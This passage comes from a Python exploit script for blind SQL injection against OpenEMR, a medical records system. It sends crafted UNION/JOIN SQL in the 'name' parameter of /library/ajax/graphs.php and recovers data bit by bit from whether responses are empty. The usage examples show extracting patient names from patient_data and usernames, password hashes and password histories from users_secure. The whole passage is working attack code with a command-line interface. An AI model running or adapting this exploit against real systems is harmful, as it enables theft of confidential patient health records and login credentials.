csrf_token: Value of the OpenEMR CSRF token :param params: Dictionary of GET parameters :param resource: Path to the target resource :return: Raw response body as bytes """ params = { "table": "LBF", "title": "", "name": ( "date, 1 FROM (SELECT 1 AS field_value) AS ld JOIN " "(SELECT 1 AS n UNION ALL SELECT 2 UNION ALL SELECT" " 3 UNION ALL SELECT 4 UNION ALL SELECT 5) AS numbers" f" WHERE {condition} UNION ALL SELECT ld.field_value AS date" ), } params["csrf_token_form"] = csrf_token content = urlencode(params, safe="()") url = f"https://{host}{resource}" context = _create_unverified_context() req = Request(url, data=content.encode()) req.add_header("Cookie", f"OpenEMR={cookie_value}") with urlopen(req, context=context) as response: return response.read() def process(results: dict, name: str): """ Post-process a results entry based on its name prefix. - If name starts with "count", convert bits to int and update global current_line_number. - If name starts with "length", convert bits to int and update global current_string_size. - If name starts with "ascii", convert bits to int, then to chr, update the results dict, and store the name in global last_string_id. - If name starts with "string", concatenate all characters corresponding to last_string_id (from results) to form the full string. Assumes a function `_bits_to_int(bits: str) -> int` exists. :param results: Dict storing the bit strings or computed characters. :param name: The key in results to process. """ global current_line_number, current_string_size, last_string_id value = results[name] if name.startswith("count"): val_int = _bits_to_int(value) current_line_number = val_int results[name] = val_int print("[#] Row count for table:", name.split()[1], val_int) elif name.startswith("length"): val_int = _bits_to_int(value) current_string_size = val_int results[name] = val_int _, table_column, offset = name.split() print("[#] String length:", table_column, offset, val_int) elif name.startswith("ascii"): char = results[name] = chr(_bits_to_int(value)) last_string_id = name print("[>] Character recovered:", char) elif name.startswith("string"): if last_string_id is None: results[name] = "" return characters = "" *identifiers, position = last_string_id.split() identifiers = " ".join(identifiers) for position in range(1, int(position) + 1): character = results[identifiers + " " + str(position)] characters += character print("[+] Extracted string:", identifiers, characters) last_string_id = None def identify_boolean_via_checksum(host, cookie_value, csrf_token, *args, resource="/library/ajax/graphs.php", **kwargs): """ Identify boolean behavior (0 or 1) by comparing response content. Workflow: 1. Iterate over values yielded by `generate_all_rows_multiple_columns_bit_queries`. 2. Classify the value as logical 0 or 1 depending on content response match. :param host: Target IP address or hostname :param cookie_value: OpenEMR session cookie value :param csrf_token: Value of the OpenEMR CSRF token :param resource: Target resource path :return: Dictionary mapping payload -> identified boolean (0/1/None) """ results = defaultdict(str) for name, payload in generate_all_rows_multiple_columns_bit_queries(*args, **kwargs): if payload is None: process(results, name) continue response = fetch( host, payload, cookie_value, csrf_token, resource ) if len(response): results[name] = "1" + results[name] else: results[name] = "0" + results[name] return results def parse_arguments(): """ Parse command-line arguments for the OpenEMR boolean checker. Mandatory arguments: - host : Target host/IP - cookie : OpenEMR session cookie - csrf-token : OpenEMR csrf token - table : Table name (must exist in schema.json) - columns : One or more column names (must exist in schema.json[table]) Optional arguments: - --path : Resource path (default: /library/ajax/graphs.php) - --list-schema : Display all available tables and columns and exit :return: argparse.Namespace with attributes: host, cookie, csrf-token, table, columns, path """ parser = ArgumentParser( description="Boolean-based OpenEMR checker using SHA1 comparison" ) parser.add_argument("host", help="Target host/IP (mandatory)") parser.add_argument("cookie", help="OpenEMR session cookie (mandatory)") parser.add_argument("csrf_token", help="OpenEMR csrf token (mandatory)") parser.add_argument("table", help="Table name (mandatory)") parser.add_argument("--columns", required=True, action="extend", nargs='+', help="Column names (at least one required)") parser.add_argument("--path", default="/library/ajax/graphs.php", help="Resource path (default: /library/ajax/graphs.php)") parser.add_argument("--list-schema", action="store_true", help="List all tables and columns from JSON and exit") args = parser.parse_args() if args.list_schema: print("Available tables and columns:") for table, cols in schema.items(): print(f"- {table}: {', '.join(cols)}") exit(0) if args.table not in schema: parser.error(f"Table '{args.table}' not found in schema") invalid_cols = [c for c in args.columns if c not in schema[args.table]] if invalid_cols: parser.error(f"Invalid column(s) for table '{args.table}': {', '.join(invalid_cols)}") return args def main(): """ Main entry point of the OpenEMR SQL Injection exploit. Workflow: 1. Parse command-line arguments (host, cookie, table, columns, optional path). 2. Validate that the table and columns exist in the schema JSON. 3. Call `identify_boolean_via_checksum` with the provided arguments. 4. Display the results. Usage example: python3 exploit.py 172.18.0.3 84c7dded187f7601e7f0cd3d0a1780f2 583918e787c3d7816d9cb522ab103d099e55b603 patient_data --columns fname mname lname python3 exploit.py 172.18.0.3 84c7dded187f7601e7f0cd3d0a1780f2 583918e787c3d7816d9cb522ab103d099e55b603 users_secure --columns username password password_history1 password_history2 password_history3 password_history4 """ arguments = parse_arguments() identify_boolean_via_checksum( arguments.host, arguments.cookie, arguments.csrf_token, arguments.table, arguments.columns, resource=arguments.path ) main()